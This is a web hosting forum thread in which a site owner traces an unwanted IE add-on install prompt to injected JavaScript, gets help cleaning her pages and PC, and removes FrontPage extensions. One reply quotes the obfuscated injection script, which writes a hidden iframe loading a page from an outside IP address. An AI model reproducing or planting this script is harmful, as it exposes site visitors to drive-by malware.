Question........

[MaryT]

Morning all
I have this problem maybe someone can help me with.....???
I got an email from a friend telling me that when she went to my site (swtharmonygraphics.com) using IE that nasty yellow information bar jumped up and said...
'This site is trying to install 'virusremover.dll from 'OOO.AJSBIRI. If you trust this website and the add-on and want to install it click here'
So I put in a support ticket to tech support asking them if they could run a scan on my VPS. They did and it came back clear.
So I deleted my index page (th one appearing to be infected) and reuploaded it. The information bar did not reappear after that when I tried the URL again.
But I did notice that all the sites on my VPS that I maintain for clients had the yellow bar also! Ones I did not maintain did not.
I tried my URL several times yesterday and nothing. I even tried AFTER rebooting my pc and still nothing.
BUT this morning when I booted up the darn thing had reappeared!
Can anyone point me in the right direction about what to do about this??
There is obviously something, somewhere, on my site and I would be ever so grateful if anyone has anyone suggestions on how to get rid of it.
Thanks bunches

MaryT

[jon123]

hi, ididn't notice the trojan attempting to download on the index page, but rather on the purchaseware page.
I had a quick look at your source code for that page and the code below looked like the culprit

Quote:

<script>
<!--
var d=document,kol=561;
function O10H485BA7DC17234(H485BA7DC17633){ function H485BA7DC17A2A() {var H485BA7DC17E26=16;return H485BA7DC17E26;} return( parseInt(H485BA7DC17633,H485BA7DC17A2A()));}functi on H485BA7DC18225(H485BA7DC1861F){ function H485BA7DC19419() {return 2;} var H485BA7DC18A35='';for(H485BA7DC18E37=0; H485BA7DC18E37<H485BA7DC1861F.length; H485BA7DC18E37+=H485BA7DC19419()){ H485BA7DC18A35 += ( String.fromCharCode (O10H485BA7DC17234(H485BA7DC1861F.substr(H485BA7DC 18E37, H485BA7DC19419()))));}return H485BA7DC18A35;} document.write(H485BA7DC18225('3C7363726970743E696 628216D796961297B642E777269746528273C494652414D452 06E616D653D4F31207372633D5C27687474703A2F2F37372E3 232312E3133332E3137312F2E69662F676F2E68746D6C3F272 B4D6174682E726F756E64284D6174682E72616E646F6D28292 A313333373232292B2730313834325C272077696474683D373 832206865696768743D313731207374796C653D5C276469737 06C61793A206E6F6E655C273E3C2F494652414D45203E27293 B7D766172206D7969613D747275653B3C2F7363726970743E' ));
//-->
</script>

you can google help for this problem (google: var d=document,kol=561) but read the link below, it may help to find out if your vps is infected or your pc.
http://wordpress.org/support/topic/182061

[MaryT]

Thanks Jon!!
Your reply was a great help
It appears this is what I have on my pc but Im not sure if it has affected the VPS or not
I mailed tech support again today but as yet have not heard back from them
Thanks again for your reply
I owe you one as I was about tearing my hair out lol

MaryT

[James]

Could you please provide me with the ticket number ?

[MaryT]

Sure James.........
#CKO-83957-984
Thanks James

MaryT

[jon123]

Quote:

Originally Posted by MaryT

Thanks Jon!!
Your reply was a great help
It appears this is what I have on my pc but Im not sure if it has affected the VPS or not
I mailed tech support again today but as yet have not heard back from them
Thanks again for your reply
I owe you one as I was about tearing my hair out lol

MaryT

You're welcome.
I would assume that if this code is in the source files on your pc then it sounds like your pc is infected rather than the vps. Hopefully James will give you a clean bill of health.
I think if i was experiencing this problem, i personally would change my passwords on any logins i have on my site though just to make sure.

Good luck

[MaryT]

Thanks Jon
I found lots of pages with that code in them. I also found a file in the cgi bin in my site files that had nothing but that code in it. It was an index.shtml file. The code was mostly in any file named 'index'.
I ran a scan using Spy Doctor.........but it wont get rid of anything it finds unless you purchase the program LOL.
I hope my VPS is clean.........tech support did a scan yesterday at my request and found nothing they said.
Fingers crossed anyway.
Thanks so much for your help with this....I really appreciate it.

MaryT

[black-dog]

Quote:

Originally Posted by MaryT

Thanks Jon
I found lots of pages with that code in them. I also found a file in the cgi bin in my site files that had nothing but that code in it. It was an index.shtml file. The code was mostly in any file named 'index'.
I ran a scan using Spy Doctor.........but it wont get rid of anything it finds unless you purchase the program LOL.
I hope my VPS is clean.........tech support did a scan yesterday at my request and found nothing they said.
Fingers crossed anyway.
Thanks so much for your help with this....I really appreciate it.

MaryT

I wonder if you use Front Page Extensions...

[MaryT]

I dont 'use' FP extensions blackdog but they are there on my site files......
Well they were but I removed them lol
I dont use FP for building and uploading my websites.......I use Dreamweaver.
Thanks for your reply

MaryT

[black-dog]

Good.

I had a client with a similar problem but never did get to the bottom of how the code ended up on the pages. It wa a similar story, javascript in the index pages.

I'd just like to know how it gets there, for future reference.

[MaryT]

I think a lot of people would like to know how it gets there black-dog....these things are annoying.
But thankfully my VPS is clean lol

MaryT

[MaryT]

Update on this problem......
It appears to have gone!!
Thanks to Jon I found the code on all the pages it had been placed, scanned my pc and found the culprit hiding there too.
One of my clients also had the pest on her pc!
Thanks to the info from black-dog I removed all the FP extensions files.....they werent being used as I use DW
While the FP extensions were there (_vti folders) the code kept reappearing but once I rmoved them and dleted the code again, reuploaded the index page, it didnt come back.
Maybe there is a connection there somewhere??
Anyways just a quick thank you to Jon, James and black-dog for all your help. Oh and not forgetting tech support too lol
This forum and web hosting company just has to be the best!

MaryT

[black-dog]

Quote:

Originally Posted by MaryT

Thanks to the info from black-dog I removed all the FP extensions files.....they werent being used as I use DW
While the FP extensions were there (_vti folders) the code kept reappearing but once I rmoved them and dleted the code again, reuploaded the index page, it didnt come back.
Maybe there is a connection there somewhere??
MaryT

Almost certainly.

I had a client with a similar problem.

Check with tech support but I don't think removing the folders removes Front Page Extensions from your VPS.

[Administrator]

We will need to remove frontpage rpm from your vps to remove frontpage completely.

Please let me know if you want me to proceed with removal of frontpage rpm.